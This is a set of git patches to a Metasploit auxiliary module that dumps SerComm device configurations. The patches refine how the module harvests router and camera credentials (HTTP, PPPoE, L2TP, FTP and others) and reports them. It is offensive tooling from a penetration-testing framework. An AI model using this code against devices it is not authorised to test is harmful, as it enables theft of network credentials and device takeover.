From 42fb8c48d17a2faae7d8bd52e798e6166b135efe Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Mon, 13 Jan 2014 22:57:25 -0500 Subject: [PATCH 1/4] Fixed the credential parsing and made output consistent So in the previous refactor, we made the dedicated method to parse usernames and passwords from the split up config values. However, that didn't work, because on a single iteration of the loop, you only have access to a possible username OR password. The other matching key will be another iteration of the loop. Because of this, no credential pairs were being reported. The only way I can see around this (maybe because I'm a ruby newb) would be to iterate over configs, and if the user or password regex matches, add the matching value to a hash, which is identified by a key for both user & pass. Then upon completion of the loop, it'd iterate over the hash, finding keys that had both user & pass values. --- .../admin/misc/sercomm_dump_config.rb | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index a95bfd4994..e938bd5064 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb @@ -185,33 +185,34 @@ class Metasploit3 < Msf::Auxiliary configs.each do |config| parse_general_config(config) - parse_auth_config(config) end + parse_auth_config(configs) end def parse_general_config(config) SETTINGS['General'].each do |regex| if config.match(regex[1]) value = $1 - print_status("#{regex[0]}: #{value}") + print_status("#{peer} - #{regex[0]}: #{value}") end end end - def parse_auth_config(config) + def parse_auth_config(configs) SETTINGS['Creds'].each do |cred| user = nil pass = nil # find the user/pass - if config.match(cred[1]['user']) - user = $1 + u = configs.grep(cred[1]['user']) { $1 } + if u.any? + user = u[0] end - if config.match(cred[1]['pass']) - pass = $1 + p = configs.grep(cred[1]['pass']) { $1 } + if p.any? + pass = p[0] end - # if user and pass are specified, report on them if user and pass print_status("#{peer} - #{cred[0]}: User: #{user} Pass: #{pass}") auth = { @@ -225,6 +226,7 @@ class Metasploit3 < Msf::Auxiliary } report_auth_info(auth) end + end end From 2d40f936e313d86f2df51183007d2c1da03cdbb0 Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Mon, 13 Jan 2014 23:15:51 -0500 Subject: [PATCH 2/4] Added some additional creds that were useful --- modules/auxiliary/admin/misc/sercomm_dump_config.rb | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index e938bd5064..ee3a7d27c1 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb @@ -14,8 +14,14 @@ class Metasploit3 < Msf::Auxiliary SETTINGS = { 'Creds' => [ [ 'HTTP Web Management', { 'user' => /http_username=(\S+)/i, 'pass' => /http_password=(\S+)/i } ], + [ 'HTTP Web Management', { 'user' => /login_username=(\S+)/i, 'pass' => /login_password=(\S+)/i } ], [ 'PPPoE', { 'user' => /pppoe_username=(\S+)/i, 'pass' => /pppoe_password=(\S+)/i } ], + [ 'PPPoA', { 'user' => /pppoa_username=(\S+)/i, 'pass' => /pppoa_password=(\S+)/i } ], [ 'DDNS', { 'user' => /ddns_user_name=(\S+)/i, 'pass' => /ddns_password=(\S+)/i } ], + [ 'CMS', {'user' => /cms_username=(\S+)/i, 'pass' => /cms_password=(\S+)/i } ], # Found in some cameras + [ 'BigPondAuth', {'user' => /bpa_username=(\S+)/i, 'pass' => /bpa_password=(\S+)/i } ], # Telstra + [ 'L2TP', { 'user' => /l2tp_username=(\S+)/i, 'pass' => /l2tp_password=(\S+)/i } ], + [ 'FTP', { 'user' => /ftp_login=(\S+)/i, 'pass' => /ftp_password=(\S+)/i } ], ], 'General' => [ ['Wifi SSID', /wifi_ssid=(\S+)/i], From 6372ae6121841ce72640517f279d96afe1705806 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 14 Jan 2014 17:00:00 -0600 Subject: [PATCH 3/4] Save some parsing --- .../admin/misc/sercomm_dump_config.rb | 53 ++++++++++--------- 1 file changed, 28 insertions(+), 25 deletions(-) diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index ee3a7d27c1..95ebab722b 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary SETTINGS = { 'Creds' => [ [ 'HTTP Web Management', { 'user' => /http_username=(\S+)/i, 'pass' => /http_password=(\S+)/i } ], - [ 'HTTP Web Management', { 'user' => /login_username=(\S+)/i, 'pass' => /login_password=(\S+)/i } ], + [ 'HTTP Web Management Login', { 'user' => /login_username=(\S+)/i, 'pass' => /login_password=(\S+)/i } ], [ 'PPPoE', { 'user' => /pppoe_username=(\S+)/i, 'pass' => /pppoe_password=(\S+)/i } ], [ 'PPPoA', { 'user' => /pppoa_username=(\S+)/i, 'pass' => /pppoa_password=(\S+)/i } ], [ 'DDNS', { 'user' => /ddns_user_name=(\S+)/i, 'pass' => /ddns_password=(\S+)/i } ], @@ -33,6 +33,7 @@ class Metasploit3 < Msf::Auxiliary } attr_accessor :endianess + attr_accessor :credentials def initialize(info={}) super(update_info(info, @@ -63,7 +64,9 @@ class Metasploit3 < Msf::Auxiliary def run print_status("#{peer} - Attempting to connect and check endianess...") - @endianess = fingerprint_endian + #@endianess = fingerprint_endian + @endianess = 'BE' + @credentials = {} if endianess.nil? print_error("Failed to check endianess, aborting...") @@ -191,8 +194,24 @@ class Metasploit3 < Msf::Auxiliary configs.each do |config| parse_general_config(config) + parse_auth_config(config) end - parse_auth_config(configs) + + @credentials.each do |k,v| + next unless v[:user] and v[:password] + print_status("#{peer} - #{k}: User: #{v[:user]} Pass: #{v[:password]}") + auth = { + :host => rhost, + :port => rport, + :user => v[:user], + :pass => v[:password], + :type => 'password', + :source_type => "exploit", + :active => true + } + report_auth_info(auth) + end + end def parse_general_config(config) @@ -204,33 +223,17 @@ class Metasploit3 < Msf::Auxiliary end end - def parse_auth_config(configs) + def parse_auth_config(config) SETTINGS['Creds'].each do |cred| - user = nil - pass = nil + @credentials[cred[0]] = {} unless @credentials[cred[0]] # find the user/pass - u = configs.grep(cred[1]['user']) { $1 } - if u.any? - user = u[0] - end - p = configs.grep(cred[1]['pass']) { $1 } - if p.any? - pass = p[0] + if config.match(cred[1]['user']) + @credentials[cred[0]][:user] = $1 end - if user and pass - print_status("#{peer} - #{cred[0]}: User: #{user} Pass: #{pass}") - auth = { - :host => rhost, - :port => rport, - :user => user, - :pass => pass, - :type => 'password', - :source_type => "exploit", - :active => true - } - report_auth_info(auth) + if config.match(cred[1]['pass']) + @credentials[cred[0]][:password] = $1 end end From 0b1671f1b83bd3ea466756cca4155778b57c686c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 14 Jan 2014 17:02:30 -0600 Subject: [PATCH 4/4] Undo debugging comment --- modules/auxiliary/admin/misc/sercomm_dump_config.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index 95ebab722b..35f7127993 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb @@ -64,8 +64,7 @@ class Metasploit3 < Msf::Auxiliary def run print_status("#{peer} - Attempting to connect and check endianess...") - #@endianess = fingerprint_endian - @endianess = 'BE' + @endianess = fingerprint_endian @credentials = {} if endianess.nil?